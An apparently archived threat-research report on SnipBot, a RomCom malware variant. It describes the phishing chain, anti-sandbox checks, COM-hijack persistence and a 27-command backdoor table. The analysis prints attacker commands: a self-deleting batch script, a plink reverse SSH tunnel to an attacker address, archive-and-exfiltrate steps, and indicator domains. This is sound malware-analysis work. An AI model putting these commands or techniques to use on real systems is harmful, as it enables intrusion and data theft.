{
	"id": "067351ef-0cff-4b70-8850-e0fb1c125b81",
	"created_at": "2026-04-06T00:18:44.575226Z",
	"updated_at": "2026-04-10T13:11:38.134441Z",
	"deleted_at": null,
	"sha1_hash": "353219416037a7d696f24672037c80518463ac24",
	"title": "Inside SnipBot: The Latest RomCom Malware Variant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2507369,
	"plain_text": "Inside SnipBot: The Latest RomCom Malware Variant\r\nBy Yaron Samuel, Dominik Reichel\r\nPublished: 2024-09-23 · Archived: 2026-04-05 14:04:29 UTC\r\nExecutive Summary\r\nWe recently discovered a novel version of the RomCom malware family called SnipBot and, for the first time,\r\nshow post-infection activity from the attacker on a victim system. This new strain makes use of new tricks and\r\nunique code obfuscation methods in addition to those seen in previous versions of RomCom 3.0 and PEAPOD\r\n(RomCom 4.0).\r\nIn early April, our sandbox Advanced WildFire discovered an unusual DLL module that turned out to be part of a\r\nbroader tool set called SnipBot. By examining the malware sample and using Cortex XDR telemetry data, we\r\nwere able to reconstruct the infection chain and the attacker's subsequent actions.\r\nWe also discovered more related malware strains dating back to December 2023. Although the aim of the attacker\r\nis unknown, the behavior we observed indicates an attempt to pivot through the victim's network and exfiltrate\r\ncertain files.\r\nSnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's\r\nsystem. It is a new version of the RomCom malware that is mainly based on RomCom 3.0. However, it also\r\ncontains techniques seen in its offshoot PEAPOD called RomCom 4.0 by Trend Micro. Therefore, we’ve assigned\r\nit version 5.0.\r\nThis threat operates in several stages, with the initial downloader always being an executable, followed by further\r\nEXEs or DLLs. The downloader we observed was consistently signed with a valid code signing certificate that the\r\nthreat actor likely obtained either through certificate theft or fraud to purchase a new certificate, while subsequent\r\nmodules were unsigned.\r\nIn collaboration with Sophos, which initially found this new RomCom version in February during an incident, we\r\ninvestigated the malware's capabilities and gathered some knowledge about the attackers' activity on a victim’s\r\nsystem.\r\nPalo Alto Networks customers are better protected from the SnipBot malware through products like Cortex and\r\nAdvanced WildFire, with its different memory analysis features. Advanced WildFire classifies the SnipBot\r\nmalware samples in this article as malicious. Advanced URL Filtering and Advanced DNS Security classify\r\nknown URLs and domains associated with this activity as malicious.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nMalware Background\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 1 of 25\n\nRomCom RAT is a malware family that has evolved over the years to include different features and attack\r\nmethods. The threat actor using RomCom has been active since at least 2022. They engage in ransomware,\r\nextortion and targeted credential gathering, likely to support intelligence-gathering operations. RomCom has made\r\nmultiple advancements, leading to its newest iteration called SnipBot, which employs new commands and evasion\r\ntechniques.\r\nThe SnipBot variant of RomCom leverages a basic set of features that allows the attacker to run commands on a\r\nvictim's system and download additional modules. The initial payload is always either an executable downloader\r\nmasked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable.\r\nThe earliest initial sample of SnipBot we found was a PDF file that shows distorted text that states a font is\r\nmissing that’s needed to show it correctly. If the victim clicks on the contained link that’s purported to download\r\nand install the font package, they will instead download the SnipBot downloader.\r\nSnipBot consists of several stages where the initial downloader is always an executable file and the remaining\r\npayloads are either EXEs or DLLs. The downloader is always signed with a legitimate and valid code signing\r\ncertificate. We don’t know how the threat actors obtain these certificates, but it’s likely they steal them or gain\r\nthem by fraud. Subsequent modules were not signed.\r\nEmail Infection Vector\r\nBy reviewing Cortex XDR telemetry data and reverse engineering the initial sample, we were able to recreate the\r\nwhole infection chain. The initial infection vector in our case was an email that contained a link that redirects\r\ntwice to the SnipBot downloader.\r\nFigure 1 shows the chain of URLs from the initial one contained in the email to the final SnipBot downloader file\r\nlink. The attacker registered the domains fastshare[.]click and docstorage[.]link. The website temp[.]sh is a\r\nlegitimate file sharing service with a set hosting period of three days.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 2 of 25\n\nFigure 1. URL chain from the email to the downloader (icon sources).\r\nWe discovered another chain of links that was likely used by the same attacker to deliver a similar SnipBot\r\ndownloader variant. The distinct initial domain and the similar downloader file name imply this was part of a\r\ncampaign targeting multiple victims.\r\nFigure 2 shows another chain of URLs used in another attack. The attacker created the domain publicshare[.]link;\r\nit is not a legitimate file sharing service.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 3 of 25\n\nFigure 2. Different URL chain from the email to the downloader (icon sources).\r\nSnipBot Malware\r\nFigure 3 shows the infection chain of the different SnipBot stages. The initial downloader Attachment_Medical\r\nreport.exe is a 64-bit Windows executable (SHA256:\r\n57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312) disguised as a PDF file. It is signed\r\nwith a presumably stolen or spoofed certificate from CC Byg og Udlejning ApS, which is a company located in\r\nDenmark.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 4 of 25\n\nFigure 3. SnipBot execution flow from the initial EXE downloader to the main bot file single.dll\r\n(icon sources).\r\nThis downloader uses two simple yet effective anti-sandbox tricks. The first one checks for the original file name\r\nby comparing the hashed process name against a hard-coded value. The second one checks whether there are at\r\nleast 100 entries in the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs registry key,\r\nwhich is usually the case on a regular user’s system but less likely to be the case in a sandbox system.\r\nFigure 4 shows the RecentDocs registry key of a typical Windows system with more than 100 values present.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 5 of 25\n\nFigure 4. RecentDocs registry key of a typical Windows system.\r\nThe downloader is also obfuscated with a window message-based control-flow obfuscation algorithm. The\r\nmalware code is split up into multiple unordered blocks that are triggered by custom window messages.\r\nTo accomplish this, a window is created that has a callback message that contains these code blocks. The window\r\nmessage queue is used to call each block in its original order.\r\nThe first message block is triggered by sending the initial message and then each block sends the next message\r\nwhen it’s done. Additionally, each block can also send nested messages, which makes it even more challenging to\r\nfollow the execution flow.\r\nMost of the strings, such as the command and control (C2) domain name and all the names of dynamically\r\nresolved API functions, are encrypted. The threat actor likely did this to prevent easy static detection, thus making\r\nmalware analysis more time-consuming.\r\nUpon execution, the downloader contacts the first C2 domain xeontime[.]com and tries to get a PDF file and the\r\nfirst payload. We couldn’t recover the original downloaded first payload, but for an unknown reason, the attacker\r\nlater downloaded the same payload with different configuration data and started it manually. We were able to\r\nobtain this file and could continue our analysis.\r\nThe threat downloads the PDF to the local user’s temporary folder with a random name before opening it. The\r\nfirst payload is a DLL file (internally named config-pdf.dll) that the threat executes in memory. It has an exported\r\nfunction named GetStore that contains its malicious code.\r\nThis DLL file’s purpose is to download the next stage COM DLL named keyprov.dll from the second C2\r\ndrvmcprotect[.]com and inject it into Explorer. For this, it uses COM hijacking to register the file as the thumbnail\r\ncache library in the registry hive of the current user.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 6 of 25\n\nWhen restarting explorer.exe, the DLL gets loaded into its address space and executed. While this is a reliable\r\nmethod of loading a payload into Explorer, forcing it to terminate can result in a crash, as it did on the victim's\r\nmachine.\r\nFigure 5 illustrates how the registered COM DLL keyprov.dll loads into explorer.exe after restarting.\r\nFigure 5. Explorer Injection via COM hijacking as shown with Process Hacker 2.\r\nTo download the COM DLL from the C2 server, config-pdf.dll sends the command get_update_manager2.\r\nAdditionally, the first payload gets a second encrypted DLL by sending the command get_update_inet2.\r\nThis payload (internally named single.dll) gets stored in the registry in the key\r\nHKCU\\SOFTWARE\\AppDataSoft\\Software as a binary value named trem1. At last, in the same registry key, the\r\nthreat creates another binary value named trem3 that contains the string UPDE1. The threat likely uses this value\r\nto keep track of the number of updates for the registry payloads.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 7 of 25\n\nAfter keyprov.dll gets loaded into Explorer, it tries to imitate a real COM provider. It is able to do so as it’s an\r\nordinary DLL with the needed export functions DllGetClassObject and DllCanUnloadNow. To do so, the code in\r\nkeyprov.dll’s DllGetClassObject function acts as a forwarder to the same named function in shdocvw.dll, which is\r\na legit COM DLL also loaded in explorer.exe.\r\nThe code in DllMain contains the two key tasks of the DLL. These tasks are to decrypt and execute the encrypted\r\npayload in the registry and to create a network listener for incoming commands.\r\nThe threat’s first task is to decrypt and execute two DLL payloads from the registry values trem1 and trem2. In our\r\ncase, only the payload stored in trem1 got downloaded from the C2 server.\r\nThe second task is to listen on port 1342 for the following incoming string commands sent over TCP. Table 1\r\nshows the commands implemented in keyprov.dll related to the bot’s operation.\r\nCommand Description\r\ndelete bot\r\nDelete the following registry keys:\r\nHKCU\\SOFTWARE\\AppDataSoft\\Software\r\nHKCU\\SOFTWARE\\AppDataSoft\r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-\r\n6843707eb41f}\\InprocServer32\r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\r\nCreate a BAT file %LOCALAPPDATA%\\temp.cmd with content:\r\n:rep\\r\\ntimeout 5\\r\\nrmdir /Q /S %1\\r\\nif not errorlevel 0 goto rep\\r\\ndel /q %0\\r\\n\r\nCreate the following string to run the batch file via CreateProcess:\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\temp.cmd C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\KeyStore \r\nRestart the Explorer to unload any payloads:\r\ncmd /C taskkill /f /im explorer.exe \u0026\u0026 start explorer.exe \r\nupdate bot\r\nwork\r\nDecrypt and execute the payload stored in the trem2 value\r\nstart bot file Decrypt and execute the payload stored in the trem2 value\r\nTable 1. Commands for keyprov.dll’s network listener.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 8 of 25\n\nThe main SnipBot file single.dll is a backdoor that gives the attacker multiple options to execute commands or\r\ndownload and run additional payloads. All strings are encrypted, with each having its own decryption key.\r\nThe file created a mutex named SnipMutex, from which the malware’s name is derived. For the initial C2 contact,\r\nthe threat sends a string that is made from the following information collected from the victim’s system:\r\nComputer/domain name\r\nMAC address\r\nWindows build number\r\nWhether the machine is a Windows server\r\nTable 2 shows 27 commands in SnipBot’s main module single.dll.\r\nCommand Description\r\n0x1\r\nGet the total and free bytes of all available drives (RAM disk, CD-ROM, network,\r\nfixed/removable media, unknown) and send the information to the C2 server\r\n0x2\r\nGet the file and directory structure of an attacker-provided directory path and send the result to\r\nthe C2 server\r\n0x3\r\nRun an attacker-provided command-line command with a hidden cmd.exe process and\r\nthen terminate cmd.exe\r\nSend the command-line output to the C2 server\r\n0x4 Upload the file content of an attacker-provided file path to the C2 server\r\n0x5\r\nDownload the file temp-log from the C2 server to disk:\r\n%LOCALAPPDATA%\\temp-log\r\nReturn the string completed to the C2 when successful\r\n0xC\r\nExecute SnippingTool.dll via rundll32.exe and the argument single:\r\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\SnippingTool.dll,Main single\r\nSend SnippingTool.zip to the C2 server, which is presumably the output of\r\nSnippingTool.dll, and then delete the file:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.zip\r\n0xD\r\nExecute SnippingTool.dll via rundll32.exe and an attacker-provided argument:\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 9 of 25\n\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\SnippingTool.dll,Main \u003cAttackerProvidedArg\u003e\r\nReturn the string completed to the C2 when successful\r\n0xE\r\nRename SnippingTool.zip to SnippingTool_s.zip:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.zip\r\n→ %LOCALAPPDATA%\\KeyStore\\SnippingTool_s.zip\r\nSend SnippingTool_s.zip to the C2 server and delete the file:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool_s.zip\r\n0xF Send a list of running processes (file names) and their IDs to the C2 server\r\n0x11\r\nDelete the bot by sending delete bot string command to the keyprov.dll network listener\r\nReturn the string completed to the C2 when successful\r\n0x12\r\nDownload an additional payload SnippingTool.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.dll\r\nReturn the string completed to the C2 when successful\r\n0x13\r\nCreate the directory DataCache:\r\n\\%LOCALAPPDATA%\\DataCache\r\nDownload additional payload FontCache.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\DataCache\\FontCache.dll\r\nExecute the payload FontCache.dll via rundll32.exe:\r\nrundll32.exe %LOCALAPPDATA%\\DataCache\\FontCache.dll,Main\r\nReturn the string completed to the C2 when successful\r\n0x14\r\nDownload the file ms-win-tmp.zip from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\ms-win-tmp.zip\r\nUnpack ms-win-tmp.zip with a built-in unpacker to %LOCALAPPDATA%\\KeyStore\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 10 of 25\n\nReturn the string completed to the C2 when successful\r\nDelete the file ms-win-tmp.zip:\r\n%LOCALAPPDATA%\\KeyStore\\ms-win-tmp.zip\r\n0x15\r\nCreate a hidden cmd.exe process to set up a SOCKS proxy with socks5.exe and the\r\nfollowing commands:\r\ncd /d %LOCALAPPDATA%\\KeyStore\\\r\nsocks5.exe 54321\r\nCreate another hidden cmd.exe process to set up an SSH tunnel via plink.exe:\r\n%LOCALAPPDATA%\\Keystore\\plink.exe -ssh -pw \u003cAttackerProvidedPassword\u003e -R\r\n\u003cAttackerProvidedPort\u003e:127.0.0.1:54321 john@\u003cAttackerProvidedAddress\u003e -P\r\n\u003cAttackerProvidedRemotePort\u003e\r\nReturn the following string to the C2 server:\r\nstarted on - \u003cAttackerProvidedAddress\u003e:\u003cAttackerProvidedRemotePort\u003e\r\n\u003cAttackerProvidedPassword\u003e\r\n0x16\r\nTerminate the processes socks5.exe and plink.exe\r\nDelete the files ms-proxy.exe and svcnet.exe:\r\n%LOCALAPPDATA%\\KeyStore\\ms-proxy.exe\r\n%LOCALAPPDATA%\\KeyStore\\svcnet.exe\r\nReturn the string completed to the C2 when successful\r\n0x18\r\nUpload all files from the %LOCALAPPDATA%\\Datacache\\ directory to the C2 server and\r\ndelete them afterwards.\r\n0x1A Create a hidden cmd.exe process and wait for incoming 0x1B commands\r\n0x1B\r\nRun an attacker-provided command to the already running hidden cmd.exe process and send\r\nthe output to the C2 server\r\n0x1C\r\nTerminate the process into which single.dll was loaded (explorer.exe or rundll32.exe)\r\nReturn the string completed to the C2 when successful\r\n0x20 Upload all files with the extensions TXT, RTF, XLS, XLSX, ODS, CMD, PDF, VBS, PS1,\r\nONE, KDB, KDBX, DOC, DOCS, ODT, EML, MSG and EMAIL from the following\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 11 of 25\n\ndirectories to the C2 server:\r\n%\\USERPROFILE%\\Downloads\r\n%USERPROFILE%\\Desktop\r\n%USERPROFILE%\\Documents\r\n0x26\r\nDownload an additional payload paper.exe from the C2 server to disk and execute it:\r\n%PUBLIC%\\Libraries\\paper.exe\r\nRun 7-Zip to create an archive of tempFolder, which is presumably the output produced\r\nby paper.exe:\r\n%PUBLIC%\\Libraries\\7za.exe a -tzip\r\n%PUBLIC%\\Libraries\\archi.zip -w\r\n%PUBLIC%\\Libraries\\tempFolder\r\nReturn the string completed to the C2 when successful\r\n0x29\r\nRun 7-Zip to create an archive of tempFolder (if archi.zip not present), presumably, the\r\noutput produced by the payload paper.exe:\r\n%PUBLIC%\\Libraries\\7za.exe a -tzip\r\n%PUBLIC%\\Libraries\\archi.zip -w\r\n%PUBLIC%\\Libraries\\tempFolder\r\nSend the result (archi.zip) to the C2 server and delete the files:\r\n%PUBLIC%\\Libraries\\7za.exe\r\n%PUBLIC%\\Libraries\\archi.zip\r\n%PUBLIC%\\Libraries\\paper.exe\r\n0x2A\r\nDownload 7-Zip from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe\r\nReturn the string completed to the C2 when successful\r\n0x2B\r\nRun 7-Zip to create an archive of the attacker-provided path:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe a -tzip\r\n%LOCALAPPDATA%\\KeyStore\\archiveSSL.zip -w \r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 12 of 25\n\n\u003cC2ProvidedPath\u003e\r\nSend the result (archiveSSL.zip) to the C2 server and delete the files:\r\n%PUBLIC%\\Libraries\\7za.exe\r\n%PUBLIC%\\Libraries\\archiveSSL.zip\r\n0x2C\r\nTraverse all processes including system ones, search for one containing the module\r\nSnippingTool.dll and terminate it\r\nReturn the string completed to the C2 when successful\r\nDelete the payload SnippingTool.dll:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.dll\r\n0x2D\r\nDownload additional payload InfoWind.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\InfoWind.dll\r\nReturn the string completed to the C2 when successful\r\n0x2E\r\nExecute the payload InfoWind.dll via rundll32.exe:\r\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\InfoWind.dll,stw\r\nSend tempol.zip to the C2 server, which is presumably the output of InfoWind.dll and\r\ndelete the files:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe\r\n%LOCALAPPDATA%\\KeyStore\\tempol.zip\r\nTable 2. Supported commands of SnipBot’s main module single.dll.\r\nThe main module provides the operator with command-line, uploading and downloading capabilities on a victim’s\r\nsystem. It also allows an attacker to download and execute the following additional payloads from the attacker’s\r\nserver:\r\nSnippingTool.dll\r\nFontCache.dll\r\nInfoWind.dll\r\npaper.exe\r\nsocks5.exe\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 13 of 25\n\nms-proxy.exe\r\nsvcnet.exe\r\nplink.exe\r\nWhile these file names imply what the payloads might do, we can only speculate about their purposes. We haven’t\r\nseen any of these files dropped on a victim’s system during our investigation.\r\nWhen someone sends a command that the threat does not support, it sends the string command: \u003cCmdNumber\u003e\r\ndoes not exist back to the C2 server.\r\nNewer Downloader Versions\r\nWhile conducting analysis for this post, we monitored VirusTotal for any newly submitted downloader samples.\r\nWe found five newer versions that are almost identical in function, but they differ in their implementation. All\r\nsamples were hosted on temp[.]sh, which seems to be a preferred file sharing service of the attacker.\r\nThe newest version differs in the set of dynamically resolved API functions compared to the downloader from our\r\ncase. Also, the window message-based obfuscation code was removed.\r\nThe newest sample of this version we found was named Attachment_CV_June2024.exe (SHA256:\r\n5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129) and it connected to the C2 domain\r\nlinedrv[.]com to download the decoy PDF and next stage payload.\r\nWe found a slightly older sample named atch_Medical_Report_Scan05202024.exe (SHA256:\r\n0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501), that had the same signer and the\r\nC2 domain drv2ms[.]com.\r\nThe last sample, whose filename is unknown (SHA256:\r\n2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4), was signed by Hangzhou Yueju\r\nApparel Co., Ltd. and it also contacted drv2ms[.]com.\r\nThe second most recent version we found has a few window-related API functions left in the code, but the threat\r\nactors did not use them for any obfuscation techniques. This version used another anti-sandbox trick by checking\r\nwhether there are at least 50 sub-keys in the Shell Bags registry key, which is a typical number for a user system.\r\nShell Bags are stored configuration settings within the registry that remember folder display preferences, such as\r\nposition, size and view mode in Windows Explorer.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 14 of 25\n\nWe found a sample of this version named atch_List_of_Available_Documents.exe (SHA256:\r\na2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436) that was also signed by Hangzhou\r\nYueju Apparel Co., Ltd. When executed, it connected to the C2 domain olminx[.]com to download the next stage\r\npayload.\r\nThis earliest version also used the window-based control-flow obfuscation technique. We found a sample that was\r\nnamed Atch_Data_Breach_Evidence.pdf … Open with Adobe Acrobat.exe (SHA256:\r\n5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8) that was also signed by Hangzhou\r\nYueju Apparel Co., Ltd., and it connected to olminx[.]com.\r\nEarlier Versions\r\nThe earliest version of SnipBot we could find was submitted from Ukraine to VirusTotal in December 2023. The\r\ninitial infection vector was a PDF file named резюме.pdf. When opened, a message box appears saying the font\r\npackage AdSlavicF is missing, luring the victim into clicking on the link to install it and show the content\r\ncorrectly.\r\nFigure 6 shows the PDF content with the unresolved text and the message indicating to click on the URL on top.\r\nWhen the victim clicks the link, they’re redirected to the website\r\nadobe.cloudcreative[.]digital/downloads/adobe/fontpackage/, which is meant to look like a legitimate Adobe site.\r\nThe name and logo shown are the work of a threat actor attempting to impersonate a legitimate organization. They\r\ndo not represent an actual affiliation with that organization. The threat actor’s impersonation does not imply a\r\nvulnerability in the legitimate organization’s products or services.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 15 of 25\n\nFigure 6. PDF lure document leading to the SnipBot downloader.\r\nFigure 7 shows the landing page at adobe.cloudcreative[.]digital impersonating the legitimate Adobe download\r\nsite. When the victim clicks on the “Download Font Package” button, a file download dialog appears.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 16 of 25\n\nFigure 7. Fake Adobe website leading to the SnipBot downloader.\r\nFigure 8 shows a dialog that simulates a legitimate Adobe font package download. But instead, the initial SnipBot\r\ndownloader gets downloaded from temp[.]sh/VwnkO/AdobeFontPackCx6416.exe.\r\nFigure 8. Download dialog of a fake Adobe website leading to the SnipBot downloader.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 17 of 25\n\nThe executable AdobeFontPackCx6416.exe (SHA256:\r\ncfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317) is an earlier and simpler version of\r\nthe initial downloader from our incident. It also has a PDF icon, and it is signed with a valid certificate by\r\nCOSMART LLC.\r\nThe downloader checks for the original filename for full execution and dynamically resolves all functions by API\r\nhashing. It connects to the C2 server at ilogicflow[.]com to download the next stage, which we couldn’t obtain as\r\nthe server wasn’t online anymore.\r\nThe file also seems to download a real font named AdSlavicF.ttf to the same directory as the SnipBot downloader\r\nand install it via InstallFontFile from the Windows library fontext.dll. We can’t verify if this is the missing font\r\nthat makes the document’s content visible or just a random one used to make the chain of events look more\r\nlegitimate.\r\nWe also found an earlier version of config-pdf.dll (SHA256:\r\nb9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045) submitted from Ukraine to\r\nVirusTotal in January 2024. This version is not a DLL file but an EXE file submitted as webtime-e.exe. This file\r\nconnected to the C2 server at webtimeapi[.]com to download earlier versions of keyprov.dll and single.dll.\r\nThe earlier version of keyprov.dll was dropped as libapi.dll (SHA256:\r\n9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2) and was also created as a COM\r\nDLL. Again, the threat used COM hijacking to register the file as the sync registration library in the registry hive\r\nof the current user and to load it into the Explorer.\r\nThe earlier version of single.dll was encrypted and stored in the registry key\r\nHKCU\\SOFTWARE\\AppDataHigh\\Software as a binary value named state1. Also, it stored the string UPDE1 in a\r\nbinary value named state2 under the same key.\r\nAnother sample of an earlier version named CV_for_a_job.exe (SHA256:\r\n5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118) was submitted to VirusTotal in\r\nFebruary 2024. It was signed with a legitimate certificate from KHAROS LLC.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 18 of 25\n\nThe file checks for the original process name and dynamically resolves functions by API hashing. It was hosted on\r\nthe server resolved by the domain name 1drv.fileshare[.]direct, a fake file sharing service set up by the attacker.\r\nThis sample drops and opens an embedded empty PDF file named AdobeARM.log.pdf instead of downloading it.\r\nIt only connected to the C2 server at certifysop[.]com to download and execute the next stage payload from\r\nmemory.\r\nAll earlier versions only checked whether the process name was the original given filename as an anti-sandbox\r\nevasion method. They didn’t use any registry-related tricks.\r\nPost-Infection Activity\r\nWith the help of Cortex XDR telemetry data, we recreated post-infection activity from the attacker, which was\r\nmostly command-line commands. A timeline from the initial infection to the last seen command is shown below.\r\nFigure 9 shows the attacker's post-infection behavior on April 4, which occurred over a period of roughly four\r\nhours.\r\nFigure 9. Timeline of post-infection attacker activity.\r\nWith the command-line functionality of SnipBot’s main module single.dll, the attacker first tried to gather\r\ninformation about the company’s internal network, including the domain controller. Afterwards, attackers\r\nattempted to exfiltrate a list of different files from the victim’s documents, downloads and OneDrive folders to the\r\nserver with the IP address 91.92.250[.]104.\r\nThis server sent AD Explorer and WinRAR to the victim’s system for the second discovery phase. Before the\r\nexfiltration, the attacker packed the files with WinRAR (renamed as fsutil.exe), while the actual data transfer to\r\nthe server was achieved with the help of the PuTTY Secure Copy client (renamed as dsutil.exe).\r\nTable 3 shows the file types that the attackers target for data exfiltration.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 19 of 25\n\nFile type Related Software/Description\r\ndb SQLite database\r\nbbk Unclear, might be a TreePad backup file\r\ndll Windows dynamic-link library\r\nmp4 MP4 digital media container\r\nmsi Microsoft Software Installer\r\nmp3 MP3 digital audio coding\r\nwav Waveform audio format\r\ndbs SQLBase database\r\nexe Windows executable\r\niso Optical disk image\r\navi Audio video interleave\r\nonetoc2 Microsoft OneNote\r\ndcm Digital imaging and communications in medicine\r\nzbf Z-Buffer Radiance\r\nche Unclear, might be related to CHwinEHE software\r\nmov Quicktime multimedia container\r\ncab Cabinet archive\r\ndat Generic data format\r\nmkv Matroska container\r\nxdw DocuWorks\r\nzip Archive format\r\nhwp Hancom Office\r\nwmv Windows media video\r\nmpj Minitab\r\ndes CorelDRAW\r\nmtw Minitab\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 20 of 25\n\nreg Windows registry\r\nmac Unclear, might be also Minitab\r\ncnt Windows help\r\nchm Windows compiled help\r\nhlp WinHelp\r\nmpg Digital video container\r\nmpeg Digital video container\r\nmkv Matroska container (duplicate)\r\nmts Advanced video coding high definition\r\nvob Video object container\r\nTable 3. Exfiltrated file types.\r\nThis list of file types contains some unusual ones, making any conclusions about the attacker’s motivation\r\ndifficult. While some of the types appear to be standard files used to get more information about the victim's\r\nsystem, others appear to pertain to information about the victim's personal health (ZBF, DCM).\r\nThe data exfiltration attempt we observed didn’t seem to run smoothly, as the attacker tried to kill the PuTTY\r\nprocess (taskkill /pid 1628 /f). Afterward, the attacker manually downloaded a new copy of config-pdf.dll to the\r\nvictim's system and started it with rundll32.exe.\r\nWhen we analyzed this file, we found this payload was the missing one downloaded from xeontime[.]com.\r\nHowever, this new version connected to a different C2 domain cethernet[.]com to get additional payloads or\r\ncommands from the attacker.\r\nOne of the last activities we saw was that the attacker used AD Explorer (renamed as fsutil.exe) to create a\r\nsnapshot of the local AD database. We do not know whether this was successful, as the victim’s system was most\r\nlikely a company laptop without any AD access.\r\nFinally, in the second data exfiltration phase, the attacker used WinRAR to create an archive of all files contained\r\nin the folder c:\\essential\\. This is the last activity shown in XDR telemetry data. It’s likely that the attacker\r\nabandoned the victim’s system because its access to company sources was restricted, making it uninteresting for\r\nthe attacker.\r\nCharacteristics\r\nLooking at the malware’s code, we can see that the authors implemented all functionality in a small number of\r\nvery long functions. All files were coded in C++. The code contains a few minor flaws, indicating the attacker has\r\nexperience as a Windows developer, but they are not seasoned professionals.\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 21 of 25\n\nFor example, Figure 10 shows the API function CreateDirectory() is called twice in a row, which appears to be a\r\ntypical copy and paste mistake.\r\nFigure 10. Code flaw by using the API function CreateDirectoryA() twice.\r\nTable 4 shows the C2 and staging domain information with the last active IP addresses.\r\nC2/Staging Domains Last IP Address\r\nfastshare[.]click 52.72.49[.]79\r\n(drv.)docstorage[.]link 212.46.38[.]222\r\npublicshare[.]link 52.72.49[.]79\r\nxeontime[.]com 91.92.250[.]240\r\ndrvmcprotect[.]com 91.92.254[.]54\r\nmcprotect[.]cloud 185.225.74[.]94\r\ncethernet[.]com 91.92.254[.]234\r\nsitepanel[.]top 91.92.254[.]234\r\ndrv2ms[.]com 79.141.170[.]34\r\nolminx[.]com 91.92.250[.]106\r\nilogicflow[.]com 23.184.48[.]90\r\nwebtimeapi[.]com 91.92.242[.]87\r\ndns-msn[.]com 91.92.242[.]87\r\ncertifysop[.]com 23.137.248[.]220\r\nlinedrv[.]com 38.180.5[.]251\r\n(adobe.)cloudcreative[.]digital 23.137.249[.]182\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 22 of 25\n\n(1drv.)fileshare[.]direct 23.137.249[.]14\r\nTable 4. C2/Staging domain name information.\r\nConclusion\r\nWith the detection capabilities of our advanced Windows sandbox memory scanning tool, we identified an\r\nunusual DLL module as part of a new RomCom version dating back to at least December 2023. This updated\r\nRomCom version called SnipBot uses a custom obfuscation technique and new anti-analysis tricks.\r\nThe attacker's intentions are difficult to discern given the variety of targeted victims, which include organizations\r\nin sectors such as IT services, legal and agriculture. While attackers have occasionally dropped ransomware on\r\nsystems infected with RomCom in the past, this did not occur in our cases or in any of Sophos' incidents. We\r\nsuspect this threat actor has shifted its aim away from pure financial gain toward espionage.\r\nCERT-UA has also published further information about the threat actor behind SnipBot, including other tools and\r\nindicators of compromise (IoC).\r\nThis highlights the need for organizations to remain vigilant and adopt advanced security measures to protect their\r\nsystems and data from evolving cyberthreats.\r\nPalo Alto Networks customers are better protected from the SnipBot malware through products like Cortex and\r\nAdvanced WildFire, with its different memory analysis features. Advanced WildFire classifies the SnipBot\r\nmalware samples in this 